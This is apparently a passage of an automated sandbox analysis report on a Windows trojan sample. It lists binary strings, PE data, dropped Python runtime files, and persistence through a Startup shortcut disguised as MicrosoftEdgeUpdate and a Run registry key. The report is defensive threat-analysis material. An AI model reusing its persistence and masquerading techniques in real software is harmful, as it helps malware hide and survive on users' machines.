Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2311214975.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2312267619.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2307762133.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2307008995.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309513493.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: vcruntime140.amd64.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2300489824.000002431720F000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000C.00000002.2340265545.00007FF8BFB9E000.00000002.00000001.01000000.0000000E.sdmp, VCRUNTIME140.dll.10.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2311357401.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309513493.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2305736309.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2313183679.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2307202317.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310650811.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309384633.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310329484.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.10.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2312518356.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2311078798.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310816524.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2306288595.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .PdB] source: 7DF0.tmp.zx.exe.3.dr
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2307008995.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.10.dr
Source: Binary string: C:\A\21\b\bin\amd64\select.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2321669980.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309750638.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdbUGP source: 7DF0.tmp.zx.exe, 0000000C.00000002.2339757329.00007FF8B83B1000.00000002.00000001.01000000.0000000C.sdmp, ucrtbase.dll.10.dr
Source: Binary string: api-ms-win-core-file-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2307202317.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2311078798.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: vcruntime140.amd64.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2300489824.000002431720F000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000C.00000002.2340265545.00007FF8BFB9E000.00000002.00000001.01000000.0000000E.sdmp, VCRUNTIME140.dll.10.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2312870947.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2311214975.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2313183679.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2307762133.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310481991.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310329484.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.10.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2307390313.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.10.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309384633.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309750638.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2306288595.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1d 10 Sep 2019built on: Mon Sep 16 11:00:37 2019 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: libcrypto-1_1.dll.10.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310950788.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.10.dr
Source: Binary string: C:\A\21\b\bin\amd64\python38.pdb source: 7DF0.tmp.zx.exe, 0000000C.00000002.2338790461.00007FF8A8DFD000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2308985706.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.10.dr
Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2304926255.0000024317210000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.10.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2312267619.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2308013050.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-string-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310013332.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2313036528.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309639448.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.10.dr
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2306770912.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2312055704.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2308142882.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2308985706.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.10.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309257952.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2313338907.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309879949.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310650811.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\6\b\libcrypto-1_1.pdb source: libcrypto-1_1.dll.10.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310013332.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2305736309.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2307569047.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2312518356.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2313338907.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2308142882.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309257952.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310155822.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2308013050.0000024317210000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: libcrypto-1_1.dll.10.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2312690465.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309639448.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.10.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2309879949.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.10.dr
Source: Binary string: C:\A\21\b\bin\amd64\unicodedata.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2322802000.0000024317219000.00000004.00000020.00020000.00000000.sdmp, unicodedata.pyd.10.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2311585051.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: 7DF0.tmp.zx.exe, 0000000A.00000003.2313036528.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.10.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdbGCTL source: 7DF0.tmp.zx.exe, 0000000A.00000003.2310950788.0000024317210000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.10.dr
Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: 5BB2.tmp.x.exe.3.dr Static PE information: 0xD22848DC [Tue Sep 23 12:17:32 2081 UTC]
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF941B30 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleFileNameW,ExpandEnvironmentStringsW,CreateFileW,CreateFileMappingA,CloseHandle,CloseHandle,VirtualFree, 0_2_00007FF6CF941B30
Source: libcrypto-1_1.dll.10.dr Static PE information: section name: .00cfg
Source: C:\Windows\explorer.exe Code function: 3_2_0336A572 push rcx; ret 3_2_0336A5A8
Source: C:\Windows\explorer.exe Code function: 3_2_0336A595 push rcx; ret 3_2_0336A5A8
Source: C:\Windows\explorer.exe Code function: 3_2_08B8C395 push rcx; ret 3_2_08B8C3A8
Source: C:\Windows\explorer.exe Code function: 3_2_08B8C372 push rcx; ret 3_2_08B8C3A8
Source: C:\Windows\explorer.exe Code function: 3_2_09F13360 push rsp; retf 3_2_09F13379
Source: C:\Windows\explorer.exe Code function: 3_2_09F12FEC push rax; retn 0003h 3_2_09F12FF1
Source: C:\Windows\explorer.exe Code function: 3_2_11084360 push rsp; retf 3_2_11084379
Source: C:\Windows\explorer.exe Code function: 3_2_11083FEC push rax; retn 0003h 3_2_11083FF1
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Code function: 6_2_04ECD442 push eax; ret 6_2_04ECD451
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B8324A15 push rdi; ret 12_2_00007FF8B8324A1B
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B8329F52 push rdi; ret 12_2_00007FF8B8329F56
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B83244F9 push rdi; ret 12_2_00007FF8B8324502
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8B832983D push rdi; ret 12_2_00007FF8B8329844
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 12_2_00007FF8BFB9CB1B push rbp; retf 12_2_00007FF8BFB9CB28
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\_socket.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\select.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\_ctypes.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-datetime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-console-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-file-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\_lzma.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe File created: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\ucrtbase.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\libffi-7.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\_hashlib.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\_bz2.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-errorhandling-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\unicodedata.pyd Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\VCRUNTIME140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-debug-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\libcrypto-1_1.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\python38.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI14002\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MicrosoftEdgeUpdate.lnk Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Services Jump to behavior

Hooking and other Techniques for Hiding and Protection

